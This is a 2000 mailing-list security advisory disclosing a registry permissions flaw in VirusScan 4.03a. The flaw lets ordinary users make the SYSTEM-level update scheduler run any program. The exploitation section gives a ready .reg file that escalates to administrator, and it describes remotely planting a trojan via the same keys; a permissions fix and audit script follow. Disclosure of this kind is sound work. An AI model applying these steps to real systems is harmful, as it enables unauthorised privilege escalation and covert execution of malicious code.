
List:       ntbugtraq
Subject:    FW: EBE Security Advisory: VirusScan for Windows NT
From:       Kevin Beaumont <kevin () EBESECURITY ! ORG>
Date:       2000-08-15 18:20:30

  EBE Security Advisory
  13/Aug/2000

  written by Kevin Beaumont (mailto:kevin@ebesecurity.org)

-------------------------------------------------------------------------------

PRODUCTS AFFECTED

- Network Associates VirusScan 4.03a for Windows NT4 Workstation
- Network Associates VirusScan 4.03a for Microsoft Windows 2000 Professional
  (see below)


SCOPE OF ISSUE

Registry permissions issue.  LOCAL and REMOTE (see below) compromise of
system security by any user with either 'User' or 'Power User'
authentication on any workstation which is running VirusScan.


DESCRIPTION OF ISSUE

The 'Network Associates Task Scheduler Service', which runs as SYSTEM, has a
feature which allows a program to be scheduled to run after a successful
DAT update.  The program called is also passed full SYSTEM privileges.

To edit the program called, you can bring up the VirusScan Console by
right clicking on the VirusScan icon in your task bar, and selecting
'Console'.  Now right click on 'Automatic DAT Update' and select
'Properties'.  Then choose 'Advanced'.

Attempting to set this value as a local user (either in the 'User' or
'Power User' group) via the VirusScan console fails - both the tick box
to enable the feature and text box used to enter the program name are
'greyed out'.

However, under the default installation options of VirusScan, the registry
key grants Full Control to all authenticated users.

The registry key in question is:
HKEY_LOCAL_MACHINE\SOFTWARE\McAfee\VirusScan\Tasks\Update

The values in question, under that key, are:
bExecAfterUpdate       = dword:00000000
szUpdateShellScript    = ""

There is an additional value which can be used to cause the program to be
called even if the DAT update fails:

bRetrieveOnly          = dword:00000000

All users have permissions to alter the actual scheduling of the update itself
via the VirusScan Console.


EXPLOITATION OF ISSUE

Numerous attack methods are available.  Here are a few examples we have
tested:

1) Save the following text as a file called 'userman.reg'.  Open the file
so the entries are entered into the registry.  Open the VirusScan Console,
and change the schedule of the Automatic DAT update so it runs within the
next few minutes.  Then sit and wait for User Manager to kick in.
Then add your login ID into the local administrator group...

--------start---------

[HKEY_LOCAL_MACHINE\SOFTWARE\McAfee\VirusScan\Tasks\Update]
"szUpdateShellScript"="c:\winnt\system32\musrmgr.exe"
"bRetrieveOnly"=dword:00000001
"bExecAfterUpdate"=dword:00000001
"bSchedEnabled"=dword:00000001
"bLogToFile"=dword:00000000

--------snip-----------

2) Use regedt32.exe to remotely connect to other PCs in your organisation.
Set the above registry keys.  Select a program to run
(e.g. "\\file_server_1\share\trojanhorse.exe") and then wait for the Automatic
DAT update to kick in.  The program will run transparently to the user.


FIX

Use regedt32.exe to change permissions on
HKEY_LOCAL_MACHINE\SOFTWARE\McAfee\VirusScan\Tasks and its subkeys.
All users should have READ access only.  Administrators and SYSTEM should have
full control.
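As an added, defender-side example (not part of the advisory): a PowerShell script that audits the Tasks key tree named above for write ACEs held by anyone other than SYSTEM or Administrators, reports whether the post-update hook values from the DESCRIPTION section are currently set, and applies the ACL described in this section. It assumes a Windows host with PowerShell's Registry provider; the key path, value names and intended ACL are taken from the advisory.

```powershell
# Added example, not part of the advisory: audit the VirusScan Tasks key tree for
# write access held by anyone other than SYSTEM/Administrators, report whether the
# post-update hook is enabled, and apply the advisory's ACL fix. Assumes the
# PowerShell Registry provider; the key path and value names are from the advisory.
$KeyPath = 'HKLM:\SOFTWARE\McAfee\VirusScan\Tasks'
$Trusted = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators')
# Any of these rights lets a caller alter the values the update task reads.
$WriteRights = [System.Security.AccessControl.RegistryRights]'SetValue,CreateSubKey,WriteKey,ChangePermissions,TakeOwnership,FullControl'
$GenericWriteBits = 0x50000000   # GENERIC_ALL | GENERIC_WRITE, as seen on inherit-only ACEs

function Get-WeakRegistryAces {
    param([string]$Path)
    foreach ($ace in (Get-Acl -Path $Path).Access) {
        $rights = [int]$ace.RegistryRights
        if ($ace.AccessControlType -eq 'Allow' -and
            (($rights -band [int]$WriteRights) -ne 0 -or ($rights -band $GenericWriteBits) -ne 0) -and
            $Trusted -notcontains $ace.IdentityReference.Value) {
            [pscustomobject]@{ Key = $Path; Identity = $ace.IdentityReference.Value; Rights = $ace.RegistryRights }
        }
    }
}

function Test-UpdateHookEnabled {
    param([string]$Path)
    $v = Get-ItemProperty -Path $Path -ErrorAction SilentlyContinue
    return ($null -ne $v -and $v.bExecAfterUpdate -eq 1 -and -not [string]::IsNullOrEmpty($v.szUpdateShellScript))
}

function Set-TasksKeyAcl {
    # Advisory's fix: SYSTEM and Administrators full control, Users read only, inherited by subkeys.
    param([string]$Path)
    $acl = Get-Acl -Path $Path
    $acl.SetAccessRuleProtection($true, $false)              # drop ACEs inherited from the parent
    foreach ($old in @($acl.Access)) { [void]$acl.RemoveAccessRule($old) }
    $rules = @(@('NT AUTHORITY\SYSTEM', 'FullControl'), @('BUILTIN\Administrators', 'FullControl'),
               @('BUILTIN\Users', 'ReadKey'))
    foreach ($r in $rules) {
        $acl.AddAccessRule((New-Object System.Security.AccessControl.RegistryAccessRule(
            $r[0], $r[1], 'ContainerInherit', 'None', 'Allow')))
    }
    Set-Acl -Path $Path -AclObject $acl
}

# Audit the Tasks key and every subkey; remediate with: Set-TasksKeyAcl -Path $KeyPath (as Administrator)
$keys = @(Get-Item -Path $KeyPath) + @(Get-ChildItem -Path $KeyPath -Recurse)
$weak = @($keys | ForEach-Object { Get-WeakRegistryAces -Path $_.PSPath })
if ($weak.Count) { $weak | Format-Table -AutoSize } else { 'No non-admin write ACEs found.' }
if (Test-UpdateHookEnabled -Path "$KeyPath\Update") { "Post-update hook is enabled under $KeyPath\Update" }
```

Subkeys with their own protected DACLs will not pick up the inherited rules, so re-run the audit after remediating and apply Set-TasksKeyAcl to any key that still reports a weak ACE.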


OTHER NOTES

We have not tested this issue with other versions of VirusScan.  We welcome
feedback as to the vulnerability of other versions of the product.

Our test systems were as follows:

- Windows NT 4 SP5, running VirusScan 4.03a installed via Management
Console.
- Windows NT 4 SP3, running VirusScan 4.03a installed manually.
- Windows 2000 SP1, running VirusScan 4.03a evaluation version.

Under our Microsoft Windows 2000 Professional test system, we found that
'Standard Users' did NOT have permissions to write/modify these registry keys.
However, 'Power Users' did have permissions to modify them.  If you work in
a company that uses Windows 2000 and standard users are given 'Power User'
permissions, you are affected.



-------------------------------------------------------------------------------
EBE Security - non-profit security organisation based in the UK.
http://www.ebesecurity.org.  email security@ebesecurity.org.

